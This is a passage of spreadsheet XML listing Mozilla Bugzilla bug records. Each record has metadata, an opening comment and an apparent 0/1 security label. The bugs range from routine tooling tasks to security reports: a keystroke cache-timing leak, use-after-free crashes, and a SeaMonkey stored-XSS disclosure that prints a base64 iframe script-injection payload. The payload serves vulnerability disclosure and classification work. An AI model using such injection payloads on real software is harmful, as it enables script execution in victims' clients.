      <c r="H4176" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4176" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4176" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K4176" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4176" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4176" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4176" t="inlineStr">
        <is>
          <t>[pixel-stealing][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q4176" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4176" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4176" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T4176" t="n">
        <v>1</v>
      </c>
      <c r="U4176" t="n">
        <v>0</v>
      </c>
      <c r="V4176" t="n">
        <v>10</v>
      </c>
      <c r="W4176" t="inlineStr">
        <is>
          <t>I noticed a [recently-public Chromium security issue](https://bugs.chromium.org/p/chromium/issues/detail?id=1321350) involving possible cross-process leaking of information about keystrokes. The basic issue is something like, keyboard events have strings like "KeyA" associated with them that are at fixed, known, and widely-spread addresses. This means that using Prime+Probe kind of cache attacks you can maybe figure out which keys are being pressed.
Nika thinks we could be affected by the same issue, because the top level event table contains [pointers to strings which the linker could put wherever](https://searchfox.org/mozilla-central/rev/4e695325c5cfc6a37f271b98672f9c03252b1f6f/widget/WidgetEventImpl.cpp#774-779), but we could also fix this by doing what the GK atoms stuff does that [globs all of the strings together in a giant table](https://searchfox.org/mozilla-central/rev/4e695325c5cfc6a37f271b98672f9c03252b1f6f/xpcom/ds/nsGkAtoms.cpp#23-26). Chrome worked around it by dynamically generating the strings at runtime.
It sounds like [a Chromium person thought a packed string table isn't sufficient](https://bugs.chromium.org/p/chromium/issues/detail?id=1321350#c22): "this seems inevitable even with a closely packed string table, since the granulraity of the attack is ~cache-lines?".
I'm not sure what the rating for this should be. It looks like Chrome rated it Security_Severity-Medium.</t>
        </is>
      </c>
      <c r="X4176" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4177">
      <c r="A4177" t="n">
        <v>859562</v>
      </c>
      <c r="B4177" t="inlineStr">
        <is>
          <t>2013-04-08 16:49:13 -0700</t>
        </is>
      </c>
      <c r="C4177" t="inlineStr">
        <is>
          <t>Feedback API not validating forms</t>
        </is>
      </c>
      <c r="D4177" t="inlineStr">
        <is>
          <t>2013-04-25 23:50:01 -0700</t>
        </is>
      </c>
      <c r="E4177" t="n">
        <v>1</v>
      </c>
      <c r="F4177" t="n">
        <v>1</v>
      </c>
      <c r="G4177" t="n">
        <v>6</v>
      </c>
      <c r="H4177" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4177" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J4177" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K4177" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L4177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4177" t="inlineStr">
        <is>
          <t>[fireplace]</t>
        </is>
      </c>
      <c r="Q4177" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4177" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4177" t="inlineStr">
        <is>
          <t>2013-04-11</t>
        </is>
      </c>
      <c r="T4177" t="n">
        <v>1</v>
      </c>
      <c r="U4177" t="n">
        <v>0</v>
      </c>
      <c r="V4177" t="n">
        <v>7</v>
      </c>
      <c r="W4177" t="inlineStr">
        <is>
          <t>{"error_message": "'platform'", "traceback": "Traceback (most recent call last):\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/resources.py\", line 192, in wrapper\n    response = callback(request, *args, **kwargs)\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/resources.py\", line 397, in dispatch_list\n    return self.dispatch('list', request, **kwargs)\n\n  File \"/opt/zamboni/mkt/api/base.py\", line 49, in dispatch\n    .dispatch(request_type, request, **kwargs))\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/resources.py\", line 427, in dispatch\n    response = method(request, **kwargs)\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/resources.py\", line 1165, in post_list\n    updated_bundle = self.obj_create(bundle, request=request, **self.remove_api_resource_names(kwargs))\n\n  File \"/opt/zamboni/mkt/account/api.py\", line 165, in obj_create\n    bundle = self.full_hydrate(bundle)\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/resources.py\", line 698, in full_hydrate\n    value = field_object.hydrate(bundle)\n\n  File \"/Users/matt/.virtualenvs/zamboni/lib/python2.7/site-packages/tastypie/fields.py\", line 154, in hydrate\n    elif self.attribute and getattr(bundle.obj, self.attribute, None):\n\n  File \"/opt/zamboni/mkt/api/base.py\", line 271, in __getattr__\n    return self.__getitem__(name)\n\nKeyError: 'platform'\n"}</t>
        </is>
      </c>
      <c r="X4177" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4178">
      <c r="A4178" t="n">
        <v>97469</v>
      </c>
      <c r="B4178" t="inlineStr">
        <is>
          <t>2001-08-29 09:58:54 -0700</t>
        </is>
      </c>
      <c r="C4178" t="inlineStr">
        <is>
          <t>Assignee/QA/Reporter/CC don't get email on restricted bugs</t>
        </is>
      </c>
      <c r="D4178" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E4178" t="n">
        <v>1</v>
      </c>
      <c r="F4178" t="n">
        <v>1</v>
      </c>
      <c r="G4178" t="n">
        <v>4</v>
      </c>
      <c r="H4178" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4178" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4178" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K4178" t="inlineStr">
        <is>
          <t>2.13</t>
        </is>
      </c>
      <c r="L4178" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4178" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4178" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4178" t="inlineStr"/>
      <c r="Q4178" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4178" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4178" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4178" t="n">
        <v>1</v>
      </c>
      <c r="U4178" t="n">
        <v>1</v>
      </c>
      <c r="V4178" t="n">
        <v>67</v>
      </c>
      <c r="W4178" t="inlineStr">
        <is>
          <t>This is an offshoot from bug 39816, which made it possible for the Assignee, QA,
Reporter, and CC list to see a bug even if they were not a member of the group
the bug was restricted to.  However, processmail currently will not send email
to users who are not members of the groups the bug is in.  Processmail needs to
check for the role bits and act appropriately.</t>
        </is>
      </c>
      <c r="X4178" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4179">
      <c r="A4179" t="n">
        <v>1234578</v>
      </c>
      <c r="B4179" t="inlineStr">
        <is>
          <t>2015-12-22 08:52:39 -0800</t>
        </is>
      </c>
      <c r="C4179" t="inlineStr">
        <is>
          <t>UAF in sigslot code (MutexAutoLock::MutexAutoLock)</t>
        </is>
      </c>
      <c r="D4179" t="inlineStr">
        <is>
          <t>2018-02-28 10:34:12 -0800</t>
        </is>
      </c>
      <c r="E4179" t="n">
        <v>1</v>
      </c>
      <c r="F4179" t="n">
        <v>1</v>
      </c>
      <c r="G4179" t="n">
        <v>3</v>
      </c>
      <c r="H4179" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4179" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4179" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K4179" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4179" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4179" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4179" t="inlineStr">
        <is>
          <t>INCOMPLETE</t>
        </is>
      </c>
      <c r="P4179" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q4179" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4179" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4179" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T4179" t="n">
        <v>1</v>
      </c>
      <c r="U4179" t="n">
        <v>0</v>
      </c>
      <c r="V4179" t="n">
        <v>47</v>
      </c>
      <c r="W4179" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-4cae62bb-dbad-4a1c-b4bb-64ada2151215.
=============================================================
UAF (0xffffffffe5e5e5e9)</t>
        </is>
      </c>
      <c r="X4179" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4180">
      <c r="A4180" t="n">
        <v>602680</v>
      </c>
      <c r="B4180" t="inlineStr">
        <is>
          <t>2010-10-07 15:18:02 -0700</t>
        </is>
      </c>
      <c r="C4180" t="inlineStr">
        <is>
          <t>Two more talos runs on places:1354806a3b6c</t>
        </is>
      </c>
      <c r="D4180" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4180" t="n">
        <v>1</v>
      </c>
      <c r="F4180" t="n">
        <v>1</v>
      </c>
      <c r="G4180" t="n">
        <v>5</v>
      </c>
      <c r="H4180" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4180" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4180" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4180" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4180" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4180" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4180" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4180" t="inlineStr"/>
      <c r="Q4180" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4180" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4180" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4180" t="n">
        <v>1</v>
      </c>
      <c r="U4180" t="n">
        <v>0</v>
      </c>
      <c r="V4180" t="n">
        <v>2</v>
      </c>
      <c r="W4180" t="inlineStr">
        <is>
          <t>I need more talos runs on this changeset:
http://hg.mozilla.org/projects/places/rev/1354806a3b6c
For all platforms for these suites:
chrome
nochrome
dirty
tp4
cold</t>
        </is>
      </c>
      <c r="X4180" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4181">
      <c r="A4181" t="n">
        <v>1403875</v>
      </c>
      <c r="B4181" t="inlineStr">
        <is>
          <t>2017-09-28 02:44:27 -0700</t>
        </is>
      </c>
      <c r="C4181" t="inlineStr">
        <is>
          <t>Bookmarks toolbar dropzone icon doesn't have the right color with the Dark theme</t>
        </is>
      </c>
      <c r="D4181" t="inlineStr">
        <is>
          <t>2017-10-09 06:56:57 -0700</t>
        </is>
      </c>
      <c r="E4181" t="n">
        <v>1</v>
      </c>
      <c r="F4181" t="n">
        <v>1</v>
      </c>
      <c r="G4181" t="n">
        <v>2</v>
      </c>
      <c r="H4181" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4181" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4181" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K4181" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L4181" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4181" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4181" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4181" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q4181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4181" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4181" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T4181" t="n">
        <v>1</v>
      </c>
      <c r="U4181" t="n">
        <v>0</v>
      </c>
      <c r="V4181" t="n">
        <v>12</v>
      </c>
      <c r="W4181" t="inlineStr">
        <is>
          <t>Created attachment 8913134
bookmarks-toolbar-dropzone-black-icon.png
The bookmarks toolbar dropzone icon accidentally lost it's svg properties like fill, fill-opacity.
Hence it looks black on dark theme.
A follow up from Bug 1394933 Comment 18</t>
        </is>
      </c>
      <c r="X4181" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4182">
      <c r="A4182" t="n">
        <v>1369770</v>
      </c>
      <c r="B4182" t="inlineStr">
        <is>
          <t>2017-06-02 09:04:08 -0700</t>
        </is>
      </c>
      <c r="C4182" t="inlineStr">
        <is>
          <t>Backfill Search Daily Dataset</t>
        </is>
      </c>
      <c r="D4182" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E4182" t="n">
        <v>1</v>
      </c>
      <c r="F4182" t="n">
        <v>1</v>
      </c>
      <c r="G4182" t="n">
        <v>2</v>
      </c>
      <c r="H4182" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4182" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4182" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4182" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4182" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4182" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4182" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4182" t="inlineStr"/>
      <c r="Q4182" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4182" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4182" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4182" t="n">
        <v>1</v>
      </c>
      <c r="U4182" t="n">
        <v>0</v>
      </c>
      <c r="V4182" t="n">
        <v>2</v>
      </c>
      <c r="W4182" t="inlineStr">
        <is>
          <t>Yesterday we backfilled main_summary for 2017-06-01, 2017-05-31, and 2017-05-30, which also ran the search daily rollup. The search daily rollup doesn't handle backfill and always assumes it's running yesterday [1]. I'll kick off a manual backfill for the search dataset today.
[1] https://github.com/mozilla/python_mozetl/blob/master/mozetl/search/daily_search_rollups.py#L286</t>
        </is>
      </c>
      <c r="X4182" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4183">
      <c r="A4183" t="n">
        <v>1328322</v>
      </c>
      <c r="B4183" t="inlineStr">
        <is>
          <t>2017-01-03 09:57:51 -0800</t>
        </is>
      </c>
      <c r="C4183" t="inlineStr">
        <is>
          <t>Remove unused custom Django management commands</t>
        </is>
      </c>
      <c r="D4183" t="inlineStr">
        <is>
          <t>2017-02-21 08:40:54 -0800</t>
        </is>
      </c>
      <c r="E4183" t="n">
        <v>1</v>
      </c>
      <c r="F4183" t="n">
        <v>1</v>
      </c>
      <c r="G4183" t="n">
        <v>7</v>
      </c>
      <c r="H4183" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4183" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4183" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4183" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4183" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4183" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4183" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4183" t="inlineStr"/>
      <c r="Q4183" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4183" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4183" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4183" t="n">
        <v>1</v>
      </c>
      <c r="U4183" t="n">
        <v>0</v>
      </c>
      <c r="V4183" t="n">
        <v>7</v>
      </c>
      <c r="W4183" t="inlineStr">
        <is>
          <t>A few of our management commands are no longer needed.
We should go through the list and remove any that are now superfluous:
~/treeherder $ grep 'class Command' -R -l .
./treeherder/autoclassify/management/commands/autoclassify.py
./treeherder/autoclassify/management/commands/detect_intermittents.py
./treeherder/autoclassify/management/commands/es_benchmark.py
./treeherder/autoclassify/management/commands/matchers.py
./treeherder/credentials/management/commands/create_credentials.py
./treeherder/etl/management/commands/ingest_push.py
./treeherder/etl/management/commands/publish_to_pulse.py
./treeherder/etl/management/commands/read_pulse_jobs.py
./treeherder/etl/management/commands/read_pulse_resultsets.py
./treeherder/etl/management/commands/update_bugscache.py
./treeherder/log_parser/management/commands/crossreference_error_lines.py
./treeherder/log_parser/management/commands/remove_duplicate_summaries.py
./treeherder/log_parser/management/commands/test_parse_log.py
./treeherder/model/management/commands/calculate_durations.py
./treeherder/model/management/commands/clear_cache.py
./treeherder/model/management/commands/cycle_data.py
./treeherder/model/management/commands/es_import_failure_lines.py
./treeherder/model/management/commands/import_reference_data.py
./treeherder/model/management/commands/init_datasources.py
./treeherder/model/management/commands/load_initial_data.py
./treeherder/model/management/commands/migrate_to_intermediate_jobs.py
./treeherder/model/management/commands/publish_result_set_to_pulse.py
./treeherder/model/management/commands/run_sql.py
./treeherder/perf/management/commands/create_test_perf_data.py
./treeherder/perf/management/commands/generate_alerts.py
./treeherder/perf/management/commands/import_perf_data.py
./treeherder/perf/management/commands/remove_duplicate_signatures.py
./treeherder/perf/management/commands/remove_perf_signatures.py
./treeherder/perf/management/commands/remove_single_test_summaries.py
./treeherder/perf/management/commands/test_analyze_perf.py</t>
        </is>
      </c>
      <c r="X4183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4184">
      <c r="A4184" t="n">
        <v>1230686</v>
      </c>
      <c r="B4184" t="inlineStr">
        <is>
          <t>2015-12-04 15:19:38 -0800</t>
        </is>
      </c>
      <c r="C4184" t="inlineStr">
        <is>
          <t>Heap-use-after-free [@ nsLayoutUtils::SurfaceFromElement] with drawImage, many canvas elements</t>
        </is>
      </c>
      <c r="D4184" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:41 -0800</t>
        </is>
      </c>
      <c r="E4184" t="n">
        <v>1</v>
      </c>
      <c r="F4184" t="n">
        <v>1</v>
      </c>
      <c r="G4184" t="n">
        <v>3</v>
      </c>
      <c r="H4184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4184" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K4184" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4184" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4184" t="inlineStr">
        <is>
          <t>[adv-main44+][adv-esr38.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4184" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4184" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4184" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T4184" t="n">
        <v>1</v>
      </c>
      <c r="U4184" t="n">
        <v>0</v>
      </c>
      <c r="V4184" t="n">
        <v>27</v>
      </c>
      <c r="W4184" t="inlineStr">
        <is>
          <t>Created attachment 8696103
testcase (crashes ASan Firefox)
(Why 62?)</t>
        </is>
      </c>
      <c r="X4184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4185">
      <c r="A4185" t="n">
        <v>1268409</v>
      </c>
      <c r="B4185" t="inlineStr">
        <is>
          <t>2016-04-28 02:29:11 -0700</t>
        </is>
      </c>
      <c r="C4185" t="inlineStr">
        <is>
          <t>Make Lightning more findable in bug filing wizard</t>
        </is>
      </c>
      <c r="D4185" t="inlineStr">
        <is>
          <t>2019-06-14 06:32:45 -0700</t>
        </is>
      </c>
      <c r="E4185" t="n">
        <v>1</v>
      </c>
      <c r="F4185" t="n">
        <v>1</v>
      </c>
      <c r="G4185" t="n">
        <v>7</v>
      </c>
      <c r="H4185" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4185" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4185" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4185" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4185" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4185" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4185" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4185" t="inlineStr"/>
      <c r="Q4185" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4185" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4185" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4185" t="n">
        <v>1</v>
      </c>
      <c r="U4185" t="n">
        <v>1</v>
      </c>
      <c r="V4185" t="n">
        <v>8</v>
      </c>
      <c r="W4185" t="inlineStr">
        <is>
          <t>New bugs on bugzilla.mozilla.org are created through a filing wizard, where the first step is to select the product.  Mozilla's Calendar application, Lightning, is not listed on the first menu, so many users will then click on "Other Products".  This will bring them to a long list of Mozilla products.  Lightning is not listed explicitly.  Instead, the product is listed only as "Calendar: The Mozilla Calendar project".  This could confuse many users.  Please include the proper name of the project, Lightning, in the entry to increase its discoverability in this list.</t>
        </is>
      </c>
      <c r="X4185" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4186">
      <c r="A4186" t="n">
        <v>868267</v>
      </c>
      <c r="B4186" t="inlineStr">
        <is>
          <t>2013-05-02 18:13:30 -0700</t>
        </is>
      </c>
      <c r="C4186" t="inlineStr">
        <is>
          <t>HTML mail compose self-XSS due to signature text</t>
        </is>
      </c>
      <c r="D4186" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:42 -0700</t>
        </is>
      </c>
      <c r="E4186" t="n">
        <v>1</v>
      </c>
      <c r="F4186" t="n">
        <v>1</v>
      </c>
      <c r="G4186" t="n">
        <v>3</v>
      </c>
      <c r="H4186" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4186" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4186" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4186" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4186" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4186" t="inlineStr"/>
      <c r="Q4186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4186" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4186" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4186" t="n">
        <v>1</v>
      </c>
      <c r="U4186" t="n">
        <v>0</v>
      </c>
      <c r="V4186" t="n">
        <v>22</v>
      </c>
      <c r="W4186" t="inlineStr">
        <is>
          <t>From:&lt;fabiancuchietti@hotmail.com&gt;
To: "security@mozilla.org" &lt;security@mozilla.org&gt;
Subject: SeaMonkey Mail 2.17.1 - Cross-site Scripting Stored.
Date: Thu, 2 May 2013 13:08:24 -0300
-----//-----
Hello Mozilla Security Team,
Today i found a Cross-site Scripting in Sea Monkey Mail.
Details:
Software: Sea Monkey
Version: 2.17.1
Tested on: Windows 7
Vulnerability: Cross-site Scripting Stored
Steps to reproduce:
                         1 )  First install SeaMonkey, then open Mail and go to the Accounts option
                         2 ) Click in "View setting for this account"
                         3 ) Now select the text box of "signature" left labeled "Use HTML" and insert the following payload: 
                         3.p)   "&gt;&lt;iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4"&gt;
                         4) We save the settings click in OK, and we will compose a new mail.Cross-site Scripting successfully!
Proof of Concept: Screenshots.
Best Regards,
Fabián Cuchietti.</t>
        </is>
      </c>
      <c r="X4186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4187">
      <c r="A4187" t="n">
        <v>611016</v>
      </c>
      <c r="B4187" t="inlineStr">
        <is>
          <t>2010-11-10 08:31:21 -0800</t>
        </is>
      </c>
      <c r="C4187" t="inlineStr">
        <is>
          <t>Kitsune string updates</t>
        </is>
      </c>
      <c r="D4187" t="inlineStr">
        <is>
          <t>2010-11-18 14:36:31 -0800</t>
        </is>
      </c>
      <c r="E4187" t="n">
        <v>1</v>
      </c>
      <c r="F4187" t="n">
        <v>1</v>
      </c>
      <c r="G4187" t="n">
        <v>5</v>
      </c>
      <c r="H4187" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4187" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4187" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4187" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4187" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4187" t="inlineStr"/>
      <c r="Q4187" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4187" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4187" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T4187" t="n">
        <v>1</v>
      </c>
      <c r="U4187" t="n">
        <v>0</v>
      </c>
      <c r="V4187" t="n">
        <v>18</v>
      </c>
      <c r="W4187" t="inlineStr">
        <is>
          <t>This document contains all necessary string changes needed before Friday Nov 12: http://etherpad.mozilla.com:9000/kitsune-string-changes
It's still a work in progress but will be finalized no later than Thursday Nov 11. Will comment here when it's ready.</t>
        </is>
      </c>
      <c r="X4187" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4188">
      <c r="A4188" t="n">
        <v>277564</v>
      </c>
      <c r="B4188" t="inlineStr">
        <is>
          <t>2005-01-08 11:19:44 -0800</t>
        </is>
      </c>
